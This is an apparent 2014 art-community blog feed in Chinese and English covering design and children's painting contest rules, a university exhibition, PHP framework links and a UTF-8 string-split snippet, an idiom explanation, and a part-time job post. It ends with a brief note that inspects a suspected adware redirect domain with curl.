1.概念組:設計於報名本活動前未參與其他競賽、未量產之作品。
2.成品組:設計於報名本活動前未參與其他競賽、已進入生產階段、可量產之作品。

[h2]三、競賽時程[/h2]

階 段 活 動 時 程

初選 開放報名 2014/09/15 ~ 11/09

初選評選 2014/11/10 ~ 11/23

入圍名單公布 2014/11/28

決選 + 人氣票選 繳交決選作品 2014/11/29 ~ 2015/01/12

決選評選 2015/01/13 ~ 01/26

人氣票選 2015/01/19~02/24

得獎公布 2015/02/27


頒獎典禮暨論壇 聯合文創設計獎 x udn talks

頒獎典禮暨文創設計論壇 2015/03/14

[h2]四、費用[/h2]

每一參賽作品酌收報名費用新台幣600元,費用包含:
1.「聯合文創設計獎」競賽資格。
2.「聯合文創設計獎 x udn talks頒獎典禮暨文創設計論壇」貴賓席位。

[h2]五、 注意事項[/h2]

1.所有參賽者,無論身分(學生,專業設計師或社會人士),皆需遵守本競賽所有條文規定,同一團隊之參賽者平等分享所獲得之獎項/獎金。

2.關於參賽者
參加競賽作品應為作者原創之作品,如違反本規定經查獲者,主辦單位有權取消其參賽資格。
參賽者須配合提供其創作之詳細資料,作為主辦單位日後公開報導與展示之用。
為維護參賽者之智慧財產權,建議晉級決選者針對作品實體模型或成品事先申請專利。
晉級決選之參賽者,需配合主辦單位於2015/01/13(二)-01/26(一)期間參與決選評審會議,繳交模型 / 實品,並進行5分鐘作品簡報。經協調後仍無法參與者,視為放棄參賽資格。

3.關於得獎者
各組前三名得獎者須配合主辦單位參與「聯合文創設計獎x udn talks頒獎典禮暨文創設計論壇」活動,除親至頒獎典禮受獎外,並需以得獎作品為主題進行10分鐘演講。
得獎者應依本國稅法規定課稅(台灣地區參賽者扣除10%所得稅,其他國家參賽者扣除20%所得稅)。

4.關於獲獎資格取消
獲獎作品經人檢舉涉及抄襲或違反智慧財產權等相關法令,經法院一審判決確定,或經著作權審議及調解委員會調解認定確屬侵害他人著作權,主辦單位得撤銷其獲獎資格並追回已頒發之獎金及獎章。
獲獎作品經人檢舉或告發為非自行創作或冒用他人作品且有具體事證者,主辦單位得撤銷其獲獎資格並追回已頒發之獎金及獎章。
5.關於報名資料之處理
為了維護參賽者之個人資料,主辦單位依個人資料保護法規定作以下事項告知:
個人資料蒐集之目的:
參賽者之管理及服務(例如為執行本競賽而通知、聯絡參賽者)、契約管理、內部的統計調查與研究分析(法定特定目的項目標號:069,090,157)。
主辦單位將於本競賽期間內及期間屆滿後為推廣本競賽之必要範圍內,於前述目的內蒐集、處理、儲存、傳遞、使用參賽者的個人資料,不另做其他用途。
蒐集之個人資料類別:
● C001辨識個人者:如姓名、職稱、國民身分證編號、電話(住家、工作電話及手機號碼)、住址(住家、戶籍及工作地址)、電子郵遞地址、網路平台帳號等資訊。
● C002辨識財務者:如金融機構帳戶號碼與姓名。
● C021家庭情形:如性別、國籍、出生年月日、婚姻狀況等。
● C031住家及設施:住所地址及C038職業及C051學校記錄。
個人資料利用之期間、地區、對象、方式:
● 期間:本競賽期間及期間屆滿後推廣本競賽之期間。
● 地區:主辦單位執行業務所及之地區。
● 利用之對象:主辦單位、其關係企業以及合作辦理本競賽之廠商(例如金流廠商、物流廠商)。
● 利用之方式:得以紙本、電子文件、電子郵件傳送或其他合於當時科技之適當方式利用之。
依個人資料保護法第三條規定,參賽者可以針對其個人資料行使以下權利:
● 查詢或請求閱覽。
● 請求製給複製本。
● 請求補充或更正。
● 請求停止蒐集、處理或利用。
● 請求刪除。
參賽者可自由選擇是否提供相關個人資料,惟若選擇不提供或是提供不完全時,將可能導致無法取得參賽資格。
參賽者應同意主辦單位可運用獲選作品之圖片與說明文字等資料,製作推廣本競賽效益所需之相關文宣、報導、展覽等。
6.參賽者若於完成繳費後申請退費,主辦單位將酌收10%退票手續費,並取消參賽資格。
7.主辦單位享有調整本競賽活動辦法之權利,調整內容將於本活動官網公布,不另行通知參賽者。


[h1]參賽程序[/h1]

一、報名方式

1.一律採取網路報名。
2.參賽者請於期限內點選 「線上報名」 ,依規定至「udn售票網」完成加入會員及繳費後,回到本活動官網登入會員,填寫參賽資料、上傳作品電子檔案,並同意「智慧財產權聲明」,即完成報名程序。
(*每組會員帳號限上傳一件作品)
二、初選

1.為減少印刷及郵寄資源浪費,以網路平台進行收件及初選之評選,參賽者無需寄送實體作品。
2.報名提供資料規格如下:
20字內中英文作品名稱。
600字以內之中英文作品創作理念。
作品圖檔 (如有說明文字請中英文並呈,以3張為限),格式可為jpg/png/bmp,模式:RGB,尺寸:寬1190x高840像素,解析度72 dpi以上,橫式排版,單一圖檔請勿超過3MB。
作品不得標示創作者姓名、公司/單位名稱或其他可影響評選公正性之代號或標記,違者取消資格。
3.參賽者可於報名截止日2014/11/09(日)前不限次數登入本活動官網修改參賽檔案,以最終修改之檔案參與競賽。
三、決選

1.採作品簡報評審會議進行評選:
評審會議: 2015/01/13(二)-01/26(一) 擇一日進行。(主辦單位另行通知)
簡報時間5分鐘。
依評審提問回答問題。
2.參與評審會議時需繳交1:1之實體模型或成品:
概念組:提供模型。
* 繳交1:1或等比例縮小之模型。若為縮小之模型,模型尺寸需於40*40*40 (cm3)~100* 100* 100(cm3)之總體積範圍內。
成品組:提供成品。

四、人氣票選

1.參加資格:晉級決選之作品。
2.票選時間:2015/01/19(一)-02/24(二)
3.於活動時間內獲得最多票數支持的前3名,為「最佳人氣獎」得主。
評選作業
一、評審組成

1.由主辦單位邀請國內外不同領域專家組成初、決選評審委員團進行評選。
2.若評審因病、傷或其他因素不克參與評審作業,主辦單位保留更換評審團人選的權利。
二、評選方式及標準

1.資格審查:針對參賽者及其作品進行包含資格、上傳資料齊備與否、作品格式符合規格與否等審查。
2.初選:安排評選會議,各組分別選出20件入圍作品晉級決選。
3.決選:安排評選會議,晉級決選者需繳交1:1實體模型(概念組)/實品(成品組),並進行5分鐘作品簡報。
4.評選標準:
評選標準 概念組 成品組
市場性 20% 40%
量產可行性 20% -
創意性 20% 20%
美感度 20% 20%
實用性 10% 10%
直覺易用 10% 10%

5.人氣票選:邀請網友於2015/01/19(一)-02/24(二)進行票選活動,於活動期間獲得最多票數支持的前3名,為「最佳人氣獎」得主。

獎勵辦法

一、獎金

獎項/組別 概念組 成品組

金獎1名 20萬 30萬
銀獎1名 12萬 20萬
銅獎1名 8萬 10萬
優選10名 1萬 1萬
人氣獎3名 1萬

二、獎章

金獎、銀獎、銅獎及優選得獎者,頒發「聯合文創設計獎」獎章。
三、媒體宣傳


1.聯合報系(含平面及網路)針對上述得獎者進行採訪及報導露出,並得在其他媒體刊登或委託其他媒體配合報導。
2.前3名得獎者須參與「聯合文創設計獎x udn talks頒獎典禮暨文創設計論壇」,本活動亦規畫完整會後報導。
3.晉級決選者,將參與人氣票選活動,於本活動官網曝光宣傳。

四、輔導參與國際三大設計獎項競賽:

1.德國IF (德國漢諾威工業設計獎)
2.德國Red dot (德國紅點設計獎)
3.日本Good Design
* 詳細辦法由主辦單位與得獎者另行洽商。

五、經紀機會

聯合報系為培育文創產業優秀人才,成立文創經紀事業單位,提供具潛力之設計人才相關協助,包含創業輔導、個人品牌行銷、國內外參展等。上述得獎者皆享有洽談經紀合約之資格。
線上報名
報名步驟

1. 前往「udn售票網」加入會員並完成繳費 (報名費600元)。
2. 回到本頁面,登入會員後依欄位填寫參賽資料、上傳作品電子檔案。
3. 系統將發送完成報名確認函至您填寫的email。(2014-09-22 22:17)

July 寫到:
哈囉 😄

我可以!
需要的話請測試我!!


感謝回應,本週內會儘速與您聯絡(@ 您個人留言板)。

Thank you(2014-09-22 21:32)

[h1]Fragments Refining – Variable and Invariable of Contemporary Art[/h1]


碎碎煉~當代藝術的變與不變

展覽簡介:
我們見到歷史中的藝術作品種類不斷地流變擴張,
當代藝術的多元甚至達到打破媒材形式的藩籬,
似乎已到了沒有甚麼不可以的無邊無界。
如果藝術創作的媒材形式可以是多樣的、是可變動的,
那麼,其中是否仍有甚麼是維持不變的?
或是,真有這個不可變動的存在嗎?
媒材形式看似不相干的零碎,其相互之間是否維繫著共同存有的本質?

「碎碎煉」展邀請十一位藝術家,提出多樣媒材的作品展出,
在可變的藝術形式之中,尋覓一種不可變的藝術價值。
這個藝術價值是眾多藝術家進行藝術創作的本心,
相信藝術價植的存在是支持藝術家繼續從事創作的力量,
對原本初衷的回歸更是藝術家於創作過程中不致迷途的指引。

「碎碎煉」展要講的就是這個謹守藝術價值本心的創作態度,
以展覽以及展覽裡的作品叨叨「碎唸」歷久不衰的「淬煉」。

參展藝術家:

王午、石晉華、李根在、呂浩元、吳季璁、吳繼濤、林羿束、翅男、郭慧禪、葉怡利、葉育男
(按姓名筆劃次序排列)

策展人介紹:

徐婉禎,早期專業於科學領域,交大電物系及物理研究所碩士畢業後,
進入台積電擔任製程整合工程師工作。爾後轉向跨足藝術領域,
以藝術評論專業取得台灣師範大學美術研究所藝術創作理論博士學位畢業,
現為東海大學美術系兼任助理教授,同時亦身兼獨立策展人與藝評寫作家。
目前所教授的課程為「台灣美術史」,曾執筆《藝術家》雜誌「台灣當代藝術新生態」專欄,
並有多篇藝評文章發表於期刊或雜誌,期間至今,仍不間斷於藝術策展工作。
展期: 2014. 9/24 – 10/26(可蓋藝文護照展覽章~)
展覽地點: 交大藝文空間
開幕茶會: 9/24(三)12:00pm(備有茶點,歡迎自由參加~)
經典通識教育講座: 9/24(三)13:20–15:10pm
地點:圖書館B1浩然國際會議廳
主持人:策展人 徐婉禎
與談人:藝術家 王午、吳季璁、吳繼濤、林羿束、翅男、郭慧禪、葉怡利、葉育男
+李家祥 (科技藝術作品工程裝置)

導賞網頁: http://acc.nctu.edu.tw/gallery/1409_fragments
歡迎按讚加入【交大藝文空間FB粉絲團】: https://www.facebook.com/NCTUgallery
辦理單位:
主辦單位:交通大學藝文中心
贊助單位:交通大學校友會、財團法人交大思源基金會
指定投影機品牌:奧圖碼科技

開放時間:星期一~星期五 10:00 - 19:00 ; 星期六~星期日 10:00 AM - 17:00
洽詢電話:( 03 ) 513 - 1233
展場地址:新竹市大學路 1001 號 交通大學圖書館 B1 藝文空間


(2014-09-22 21:31)

[h1]2014 國泰全國兒童繪畫比賽 (2014/09/22 ~ 10/22)[/h1]

繪畫比賽官方網站: http://www.cathaypublic.com.tw/cathayart/painting39/

繪畫比賽報名表下載: http://xor.tw/+4w83u (Office DOCx 檔案)


[h2]活動主題[/h2]
配合今年國泰慈善基金會「樹造幸福公益日」活動,以「我繪夢想-樹造幸福」為本屆繪畫主題,
希望藉由參賽學生描繪出自己對於未來的夢想,創造出屬於自己的幸福。

[h2]辦理單位[/h2]

1、指導單位:國立臺灣藝術教育館

2、主辦單位:國泰人壽保險股份有限公司(下稱「國泰人壽」)
國泰世華商業銀行股份有限公司(下稱「國泰世華銀行」)
國泰世紀產物保險股份有限公司(下稱「國泰產險」)
國泰綜合證券股份有限公司(下稱「國泰證券」)
國泰證券投資信託股份有限公司(下稱「國泰投信」)
3、承辦單位:國泰金融控股股份有限公司(下稱「國泰金控」)
4、協辦單位:中華民國兒童美術教育學會、台北市萬華區馬場町社區發展協會

比賽辦法
1、比賽組別:以103年9月之學籍為準,分為幼兒園、國小低年級、國小中年級、國小高年級等4組
2、參賽方式:

[h2]參賽方式[/h2]


徵畫
(1) 徵畫期間:103年9月22日(一)~103年10月22日(三)。

(2) 參賽者須至本活動網站:(以下簡稱「活動網站」)下載
「第39屆國泰全國兒童繪畫比賽報名表」,並於填寫完整
後黏貼於參賽作品背面。

(3) 交畫方式:參賽者可將參賽作品交給主/承辦單位所屬服
務人員,或至各地「國泰人壽」、「國泰世華銀行」或
「國泰投信」之服務據點繳交。
戶外寫生
(1) 舉辦時間:103年10月18日(六)(暫定)。
(2) 舉辦地點:於北、中、南三地(暫定)同步舉辦戶外寫生活動。
(3) 主/承辦單位於戶外寫生比賽當天將提供固定份數畫紙及
交畫紀念品予參賽者,數量有限,送完為止。

※每人限交一件作品參賽,且僅得就「徵畫」或「戶外寫生」方式擇一參賽,違反規定者取消參賽
資格,曾於國內外參賽或展出之作品亦不得參賽。

3、參賽作品規格:四開畫紙(54×39公分),畫具不拘、繪畫材料不限。
4、評審作業:(1)初審:103年10月下旬,於全台各地分區舉行。
(2)複審:103年11月初,假台北市國泰金融會議廳舉行。

獎勵
1、初審:獲得『入選獎』及『佳作獎』者,發給紀念獎狀乙張。
2、複審:於各分區獲『佳作獎』之作品可參加複審,複審獎項如下:

金牌獎
80名(每組各20名) 獎牌、畫冊、獎品

銀牌獎
120名(每組各30名) 獎牌、畫冊、獎品

銅牌獎
160名(每組各40名) 獎牌、畫冊、獎品

優選獎
480名(每組各120名) 獎牌、畫冊

得獎名單公布
金、銀、銅牌獎及優選獎得獎名單,將於103年12月於活動網站公布。

頒獎及作品展覽
1、獲得初審『入選獎』及『佳作獎』之得獎者,主/承辦單位將由專人或委託學校致贈紀念獎狀。
2、獲得複審『優選獎』以上之得獎者,主/承辦單位將由專人或委託學校代贈或舉辦頒獎典禮之
方式頒發獎勵。

[h2]抽獎活動[/h2]
主/承辦單位將另就「入選」及「佳作」作品抽出『指導老師獎』及『幸福學生獎』各20名,抽獎
資格及獎項如下:

指導老師獎: 20名
旅遊住宿券(獎項內容,將於抽獎時公告) 獲「入選」及「佳作」作品之指導老師

幸福學生獎: 20名
旅遊住宿券(獎項內容,將於抽獎時公告) 獲「入選」及「佳作」作品之學生


藝術遊學之旅
1、為延續小朋友對美術學習的熱情,主/承辦單位將另行針對本次繪畫比賽各組獲得金、銀、銅、
優選、佳作及入選獎之參賽者,免費舉辦「藝術遊學之旅」活動,活動內容主要係結合舉辦地
點的在地特色,規劃各類藝術美學課程,讓小朋友有機會體驗除了美術之外的多元美學。

2、「藝術遊學之旅」活動採報名方式參加,報名參加人數如超過預訂錄取人數,將由主/承辦單位
以電腦隨機選出正取名單及備取順序。
3、主/承辦單位將另行於10月中旬公布「藝術遊學之旅」詳細活動辦法於活動網站。


[h2]注意事項[/h2]

1、每人限交一件作品參賽,且僅得就「徵畫」或「戶外寫生」方式擇一參賽,曾於國內外參賽或
展出之作品亦不得參賽,違反者取消參賽資格。

2、所有參賽作品均不退還,參賽者(未成年者包含其法定代理人,以下同)應擔保對其參賽作品擁
有合法之權利(包括但不限於著作權、肖像等人格權),絕無侵害他人智慧財產權或其他權利之
情事,以及同意將參賽作品無償授權主/承辦單位使用(包括但不限於印刷、複印、錄影、攝影、
掃描、翻拍、編輯、重製、公開展示、散布等)。參賽者違反其同意暨擔保內容者,主/承辦單
位得取消參賽/得獎資格、追回所得獎勵,相關法律責任由參賽者自行負責,概與本活動各辦理
單位無關,如致主/承/協辦單位受有損害者,並應負賠償之責任(包括但不限於主/承/協辦單位
所支出之律師費、訴訟費)。

3、主/承辦單位之員工”不得”參加「指導老師獎」之抽獎活動。

4、以戶外寫生參賽者應認知並瞭解戶外寫生屬戶外活動性質,參加前應請自行確認體能及健康狀
況均適宜參加。如因參加致身體不適,概由參賽者自負責任,與主/承/協辦單位無涉。

5、依中華民國稅法規定,本次活動得獎者若為中華民國境內居住之個人,且全年度自國泰人壽累
計取得之獎勵價值超過新臺幣1,000元以上時,國泰人壽將開立所得稅扣繳憑單,如所得獎勵價
值為新臺幣20,000元(含)以上時,得獎者需先繳交10%機會中獎稅金,始可領獎。得獎者若為非
中華民國境內居住之個人(即在中華民國境內居住未達183天之本國人及外國人),不論中獎獎勵
價值,均須先就中獎所得扣繳20%機會中獎稅金,始可領獎,且國泰人壽將開立所得稅扣繳憑
單。若未能依法繳納應繳稅額,即視為喪失得獎資格。得獎者參與本活動而需支付任何稅捐皆
為其個人之義務,概與主/承/協辦單位無關。前述稅捐法規如有更新或變動者,依修正後規定辦理。

6、獲/中獎通知:

(1)主/承辦單位將依報名表上之聯絡資訊送出獲/中獎通知,參賽者及指導老師(以下合稱參加人)
請自行確認報名表上所填寫之資料均屬正確,若因資料不全、錯誤致無法通知活動相關訊息
者,或因資料錯誤而致領獎人資料不符時,主/承辦單位將取消獲/中獎資格且不負任何法律
責任。
(2)抽獎活動之中獎者須於接受通知之日起30日內完成通知中所述之『領獎手續』,逾期或未完
成相關手續者,視同放棄得獎權利;不接受開立扣繳憑單者,亦同。
7、參加人(未成年人包含其法定代理人,以下同)及指導老師於填寫報名資料參加本活動之同時,即
表示已詳閱及同意本活動辦法之相關規定,並明確瞭解主/承/協辦單位因辦理本活動之一切需要
或其他法令許可目的 (下稱蒐集目的),得將參加人提供之姓名、聯絡方式及其他於活動相關書件
或依法可得蒐集之個人資料,於前開個人資料蒐集之特定目的存續期間、相關法令規定及為活
動參加人之相關權益(如預備未來供本活動參加人查詢、得獎通知)之期間(以孰後屆至者為準),
供主/承/協辦單位、本活動之委外廠商及依法有權機關(構)與金融監理機關,以自動化機器或其
他非自動化之利用方式,於前揭利用對象之國內及國外所在地,依個人資料保護相關法規蒐集、
處理、國際傳輸及利用。

8、主/承/協辦單位於未經參加人之同意,不得利用其所提供之個人資料進行商業行銷行為。參加人
於本活動期間內就其提供之個人資料,得依個人資料保護法等相關法規向主/承/協辦單位(1)查詢、
請求閱覽或請求製給複製本,而主/承/協辦單位依法得酌收必要成本;(2)請求補充或更正個人資
料,惟依法需先適當釋明其原因及事實;(3)請求停止蒐集;(4)在個人資料正確性有爭議時,請
求停止處理或利用本人之個人資料,惟主/承/協辦單位因執行業務所必須並註明其爭議或本人書
面同意時不在此限;(5)於前開蒐集之特定目的消失或期限屆滿時,請求刪除、停止處理或利用
本人之個人資料,惟主/承/協辦單位因執行業務所必須或經本人書面同意者不在此限。參加人得
自由選擇是否提供完整資料,若選擇不提供個人資料、或提供之個人資料不完全或不正確、或
請求刪除或停止蒐集、處理與利用其個人資料者,將喪失本活動之參賽或中獎資格。

9、本活動如有任何因電腦、網路、電話、技術或其他不可歸責於主/承辦單位之事由,致參與本活
動者所寄出或登錄(填寫)之作品、資料有遺失、錯誤、無法辨識或毀損等情形,主/承辦單位
不負任何法律責任。

10、經主/承辦單位認定參加人、參賽作品或中獎情況,有違反本活動辦法、偽造、詐欺或其他不
正當行為,足以影響本活動公平性或侵害其他參加人權益者,主/承辦單位除有權排除其參與本
活動、刪除參賽作品或取消中獎資格外,並保留所有法律上之權利。

11、本活動獎項悉以實物為準,如遇缺貨或其他因素而無法提供時,主/承辦單位有權以其他等值
商品替代,中獎人不得異議,亦不得要求將獎項讓與他人、以其他物品替代或折換現金,若有
遺失或被竊,主/承辦單位將不發給任何證明或補償。

12、主/承辦單位非本活動獎項的商品製造者(/服務提供者),且與各該獎項之商品製造者(/服務提供
者)無任何代理或合夥關係,故本活動贈送之獎項,其使用方式、期限及相關限制等,悉依該獎
項所載(/附) 之使用說明及相關須知為準,若有疑問請洽商品製造人 (/服務提供者)。如因使用本
獎項而引起之爭議、糾紛、損害賠償(包括但不限於民、刑法及消費者保護法等),由商品製造人
(/服務提供者)自行負責,概與主/承辦單位無涉。

13、主/承辦單位保有以公告方式隨時解釋、補充、修改、變更本活動辦法之權利;若因非可歸責於
主/承辦單位之事由而無法進行時,主/承辦單位有權決定取消、終止、或暫停本活動。(2014-09-22 14:07)

[h1]各種 PHP Framework 應用程式框架清單/官方網站整理[/h1]


1. ZEND (ZEND1/ZEND2) & PEAR

=> http://framework.zend.com/
=> http://pear.php.net/

2. Symfony (Symfony1/Symfony2)

=> http://symfony.com/

3. Laravel.com

=> http://laravel.com/

4. Phalcon

=> http://phalconphp.com/

5. Kohana

=> http://kohanaframework.org/

6. CodeIgniter

=> https://ellislab.com/codeigniter
=> http://www.codeigniter.org.tw/ (中文網站)

7. Yii

=> http://www.yiiframework.com/
=> http://www.yiiframework.com/performance/

8. CakePHP

=> http://cakephp.org/

9. PHP-MVC

=> http://www.php-mvc.net/

10. Pardo

=> http://www.pradosoft.com/


大部分 PHP IDE (e.g. ) 都支援或多或少「多個以上」的主流 PHP Framework
e.g.
ZEND Studio: http://www.zend.com/en/products/studio (支援 ZEND, Laravel, Symfony
PHP Storm: http://www.jetbrains.com/phpstorm/features/ (支援 Symfony2 & Yii


(2014-09-22 13:24)

[h1]Sore thumb 的中文意思/翻譯 Stick/Stand out like a sore thumb[/h1]


Sore Thumb: (酸痛的手指)這裡引伸為「特別突出/與眾不同」

所以中文的意思是:突出顯眼、與眾不同、吸引人注意


[h2]例句 #1: Stick out like a store thumb[/h2]

John sticks out like a sore thumb in the seminar. He wears a purple tall hat all day long.
約翰在研討會上顯得特別與眾不同,因為他戴了一頂紫色高帽。


[h2]例句 #2: Stand out like a store thumb[/h2]

I'd remember that your red sports car stood out like a sore thumb in school parking lots.
我記得以前你的紅色跑車,在學校停車場總是特別引人注意。


[h2]例句 #3: sore thumb[/h2]

These PHP frameworks looks all incredibly similar;
except for Zend, which just stands out like a sore thumb.

這些 PHP Frameworks 看起來都是很相似;
唯一的例外是 ZEND Engine, 用起來就是和別人不一樣!


1171534284
塗鴉跑車
(2014-09-22 12:24)

[h1]PHP: str_split_unicode() str_split_utf8() Split UTF8 Character into Array[/h1]

See example php code below. (PHP 5.X)

e.g. Explodes/splits string '你好' into array('你, '好');


代碼:

<?PHP

// REF: http://us.php.net/str_split
function str_split_unicode($str, $l = 0)
{
    if ($l > 0) {
        $ret = array();
        $len = mb_strlen($str, "UTF-8");
        for ($i = 0; $i < $len; $i += $l) {
            $ret[] = mb_substr($str, $i, $l, "UTF-8");
        }
        return $ret;
    }
    return preg_split("//u", $str, -1, PREG_SPLIT_NO_EMPTY);
}

$a = 'ㄕㄨ'; // BPMF ZH_TW UTF8/Unicode character

$aa = str_split_unicode($a);

$aaa = str_split($a);

var_dump($a);
var_dump($aa);
var_dump($aaa);

?>


代碼:

$ php str_split_utf8.php

string(6) "ㄕㄨ"

array(2) {
  [0]=>
  string(3) "ㄕ"
  [1]=>
  string(3) "ㄨ"
}

array(6) {
  [0]=>
  string(1) "▒"
  [1]=>
  string(1) "▒"
  [2]=>
  string(1) "▒"
  [3]=>
  string(1) "▒"
  [4]=>
  string(1) "▒"
  [5]=>
  string(1) "▒"
}
(2014-09-22 00:03)

yaten 寫到:
這個題材實在是太可愛了.我好喜歡白文呀...


Agree!

I got two white java finches;
e.g. http://vovo2000.com/phpbb2/viewtopic-15982.html

They aged and passed away around 9~10 yro.
Plan to raise another ones, yet afraid of the feeling of pet loss.(2014-09-19 13:17)

rekion 寫到:
您好,我是Rekion。
我平常都在使用電腦和網路,定期蒐集比賽資訊和工作資料,打字速度也很快。

目前我還是新鮮人,時間比較多,我可以勝任這份工作。
這工作所提供的資訊我也十分需要,

肯請給我測試機會 😄

Email: therealrekion@gmail.com
skype: rekionis1
FB : https://www.facebook.com/chingyung.wang

謝謝



感謝回應,但您的發表不足 20 篇(現在可補,補完請留言給我 or 回應),
請先詳細看過資格限定部分,謝謝!(2014-09-19 00:26)

[center]奇幻人物(2)[/center]
##DIV##
[center]
[h1]場景設定、奇幻人物設計(2) - Arpachi Sci-Fi/Fantasy Landscape/Mob Design[/h1]

Deathknight_CG DTKT - Death Knight CG
Barren-Land_Red-Canyon_HA RDCYN - Barren Land Red Canyon
Barren-Land_Silent-Swamp_HA SLTSWP - Barren Land Silent Swamp
baren_forest_HA SRWFST - Barden Forest
smile_done Smile - Char Design
[hr]
More! Arpachi(Arpachi) Artworks:
http://vovo2000.com/paintbbs/art/arpachi/
http://vovo2000.com/artist/arpachi/

http://vovo2000.com/phpbb2/viewtopic-349215.html
[hr]
See Also Related...
[url=http://vovo2000.com/tags/遊戲/]
「遊戲」相關創作 :: "Game Design" Artworks Illustration
[/url]

[url=http://vovo2000.com/tags/戰鬥/]
「戰鬥」相關創作 :: "Fighting/Battle" Artworks Illustration
[/url]

[url=http://vovo2000.com/tags/怪物/]
「怪物」相關創作 :: "Monster/Mob Design" Artworks Illustration
[/url]

[url=vovo2000.com/tags/奇幻/]
「奇幻」創作 :: "Fantasy/Si-Fi" Artworks Illustration

[/url]

[/center](2014-09-14 23:31)

[h1]兼職工作:Vovo2000.Com 徵求「兼職美術資訊整理」 2014+[/h1]


本文期限/過期日:2014/09/13 ~ 2009/09/30
公司名稱:Vovo2000.com
統一編號:N/A
工作職稱: 美術資訊整理兼職 Part-Time

工作性質: 包含 下列「工作項目」
--------------------------------------------
1. 每週一天,約一小時,建議週三(可自選)
==> 整理六篇「美術比賽資訊」

2. 每週另外一天,約一小時,建議週末(可自選)
==> 整理六篇「美術展覽資訊」

3. 每週另外一天,約一小時,建議週末(可自選)
==> (此工作項目,等錄取後 or 試作時,會再詢問看有無意願進行)
--------------------------------------------

工資待遇:
==> 每個工作項目新台幣 $150 (== 每週約 300 ~ 450 == 每個月約 1500 ~ 2250,看要不要接第三項而定

工作時間:不限定,每個項目動作快約 0.5 ~ 1 個小時,慢則 1.5 ~ 2 小時。 完成工作即可。

工作地點:不限定,隨便你,在家、在外、在網咖、學校、公司皆可! 完成工作即可。

工作名額: 1



聯絡方式:
(1) 留言板 http://vovo2000.com/msg/Type/
(2) 或者回應本文


之後會挑選會員進行試作;試作不管有無錄取,一樣「有」相對定費用!(會照比例匯款給您!)


公司網頁: http://vovo2000.com/


資格限定
--------------------------------------------
a. 需為 vovo2000.com 會員,發表(作品 or 文章 or 回應)超過 20 篇者

b. 能順利上網者,信箱沒有問題,有問題會隨時聯絡

c. 熟知 vovo2000.com 發表、回覆、刪除、編輯文章、上傳圖片、推薦、收藏、留言板等基本功能,
使用的瀏覽器可順利閱讀並發表繁體中文。

d. 對一般美術、設計、藝文、動漫電玩、插畫等美術相關資訊有基本了解

e. 新台幣待遇以「每月轉帳」實施,次月 5 日左右結算上月所得,
所以,必須要有一個您本人的台幣銀行帳戶,或,郵局帳戶方便轉帳。
--------------------------------------------



--------------------------------------------
其他說明:
--------------------------------------------
1. 這個工作,對平常慣用網路使用的會員非常輕鬆(或者打字快的會員),
就只是將美術展覽(包含個展、特展、大展等)、美術比賽做出整理,
賺台幣順便賺 V 幣,發表文章又可得到 V-Coins,又可熟知目前美術藝文的新聞動態。

2. 蒐集資訊、打字、滑鼠剪剪貼貼快的話,
每個項目約不到一個小時,
不用奔波,不用日曬雨淋,只要有「網路、鍵盤、滑鼠」
在家輕鬆兼職。

3. 「整理速度慢、打字慢、或者網路慢」的會員也可參與,不過可能不划算...

4. 藝文新聞通常也會含有「文學、音樂、舞台劇」等展覽,通常這些不用整理, 不過如果和美術有扯上關係的,可看狀況考慮

5. 上一位幫忙的會員做了約 4 年 (2009 ~ 2014),
因為新工作太忙無法繼續,非常感謝他!



[h1]必看!參考範例:[/h1]
http://vovo2000.com/phpbb2/forum-141.html
http://vovo2000.com/phpbb2/forum-424.html

展覽舉例 http://vovo2000.com/phpbb2/viewtopic-332366.html
比賽舉例 http://vovo2000.com/phpbb2/viewtopic-363470.html


** 有問題歡迎發問 **

(2014-09-14 20:04)

[h1]Mavoo.net: An Adware or Trojane? (2014)[/h1]


1. First seen: 2014 June ~ July

2. A middle-man rewrite: Modify the HTML in Chrome, with path "/go/" + digest,

3. Then do a 302 rewrite to collect data.

4. Not 100% reproducible, only found in Chrome; might triggered by Google Chrome extension? ( not sure )

5. Wuxi Yilian ... hmm


代碼:

http://mavoo.net/?q=alexa
http://mavoo.net/?q=bestbuy

-------------------
$ curl -v http://mavoo.net/go/k5nKY3VRAcJ7v5-yafpvVDnjH4AUfqYT68spu8E2_fLHPKLeEI7CacYIIJGLTdcLU8TDTXSYMt48kxmjoB3QcD3CIeijb-rvh6udbdIfc7TAqILKAVAQq2nya1ZuGmRCnPrEvzL89amle2n57M2lluqxtQJd0T57-4e0gBEbMv3Iq6fHVVHkwqHzs-y7E7tz7Ouk0YkzCVCA_xOuv5fD4Tx6hOK6pB62iEkiLp8ApNRAZd3SxTPktKvS2ctq3Tw5/LMGzbACb3Q81v7OruwTA041p83OSO0I7Ox-EPYx3Pao,
* About to connect() to mavoo.net port 80 (#0)
*   Trying 213.211.147.115... connected
> GET /go/k5nKY3VRAcJ7v5-yafpvVDnjH4AUfqYT68spu8E2_fLHPKLeEI7CacYIIJGLTdcLU8TDTXSYMt48kxmjoB3QcD3CIeijb-rvh6udbdIfc7TAqILKAVAQq2nya1ZuGmRCnPrEvzL89amle2n57M2lluqxtQJd0T57-4e0gBEbMv3Iq6fHVVHkwqHzs-y7E7tz7Ouk0YkzCVCA_xOuv5fD4Tx6hOK6pB62iEkiLp8ApNRAZd3SxTPktKvS2ctq3Tw5/LMGzbACb3Q81v7OruwTA041p83OSO0I7Ox-EPYx3Pao, HTTP/1.1
> User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
> Host: mavoo.net
> Accept: */*
>
< HTTP/1.1 302 Found
< Server: nginx
< Date: Sat, 13 Sep 2014 05:37:11 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-Powered-By: PHP/5.4.13
< Location: http://mavoo.net/?q=alexa
<
* Connection #0 to host mavoo.net left intact
* Closing connection #0
